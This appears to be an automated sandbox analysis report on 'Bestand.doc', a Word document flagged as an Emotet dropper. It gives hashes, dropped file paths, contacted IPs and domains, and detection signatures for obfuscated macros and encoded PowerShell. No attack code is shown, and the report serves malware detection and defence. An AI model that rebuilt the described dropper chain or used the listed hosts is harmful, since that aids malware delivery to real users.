31.0.0 Red Diamond
IR
337085
CloudBasic
18:35:17
07/01/2021
Bestand.doc
defaultwindowsofficecookbook.jbs
Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
WINDOWS
64553aae596a4b3177964c3bac7502eb
9cdaf9d3f8dc72d15055fb5ca20fc0dd79b438ff
05ec62e5c17cce0faee1f6e791180a7104de6a277f0a3981a65ad43286b5854f
Microsoft Word document (32009/1) 79.99%
true
false
false
false
100
0
100
5
0
5
false
C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{9B0EF2ED-537D-406E-B057-1B1541B1D39D}.tmp
false
5D4D94EE7E06BBB0AF9584119797B23A
DBB111419C704F116EFA8E72471DD83E86E49677
4826C0D860AF884D3343CA6460B0006A7A2CE7DBCCC4D743208585D997CC5FD1
C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-966771315-3019405637-367336477-1006\f554348b930ff81505ce47f7c6b7d232_ea860e7a-a87f-4a88-92ef-38f744458171
false
3B7B4F5326139F48EFA0AAE509E2FE58
209A1CE7AF7FF28CCD52AE9C8A89DEE5F2C1D57A
D47B073BF489AB75A26EBF82ABA0DAB7A484F83F8200AB85EBD57BED472022FC
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\Bestand.LNK
false
3E9F0F87D8B31070B39E2755FBF0A3C5
2DB1EDA1104A69FB283E1681C32B552E22EEA3FD
708FFE01FFA85316F7E0B238F1A2479CED34796F19DF08946C9A7ECAB06C73C7
C:\Users\user\AppData\Roaming\Microsoft\Office\Recent\index.dat
false
5A1F1D8C9E6C6E24A01B52F5F2834005
5670FB6B5EA66B2BF15329B232C1628566625A92
9D3FAE6D0BDDB4CFC66E3542A4B42782E352C0A5F1BDB1999CCC5C59B9BCFC68
C:\Users\user\AppData\Roaming\Microsoft\Templates\~$Normal.dotm
false
39EB3053A717C25AF84D576F6B2EBDD2
F6157079187E865C1BAADCC2014EF58440D449CA
CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T34CJE67ZJGLFSV18T6Q.temp
false
1A838ABB3A40279F383AB1C21E56F683
27A1DA6BA86FA744C3CC8F3D2FFFDBEC7CFFD703
5A663A1A8212AA670A701C2822949796FCAAC0AADC313CCD72E8AB09820FD5F3
C:\Users\user\Desktop\~$estand.doc
false
39EB3053A717C25AF84D576F6B2EBDD2
F6157079187E865C1BAADCC2014EF58440D449CA
CD95C0EA3CEAEC724B510D6F8F43449B26DF97822F25BDA3316F5EAC3541E54A
C:\Users\user\Lqpw_5i\F4w0osc\R95F.dll
false
1C6DB931E1A9E52F74433510909ED133
B8D72335A962827DD6DB2912ECF0FC6DC56AABD8
A39809D9A9B1DA262E89F785721DB56192DE84327342F98463761F30E17B5A52
89.252.164.58
173.255.195.246
5.2.136.90
103.92.235.25
66.153.205.191
sarture.com
true
173.255.195.246
hangarlastik.com
true
89.252.164.58
seo.udaipurkart.com
true
103.92.235.25
padreescapes.com
true
66.153.205.191
Creates processes via WMI
Document contains an embedded VBA macro with suspicious strings
Document contains an embedded VBA with base64 encoded strings
Document contains an embedded VBA with many GOTO operations indicating source code obfuscation
Encrypted powershell cmdline option found
Hides that the sample has been downloaded from the Internet (zone.identifier)
Obfuscated command line found
Potential dropper URLs found in powershell memory
PowerShell case anomaly found
Sigma detected: Suspicious Encoded PowerShell Command Line
Suspicious powershell command line found
Very long command line found
Antivirus detection for URL or domain
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
System process connects to network (likely due to code injection or exploit)
Yara detected Emotet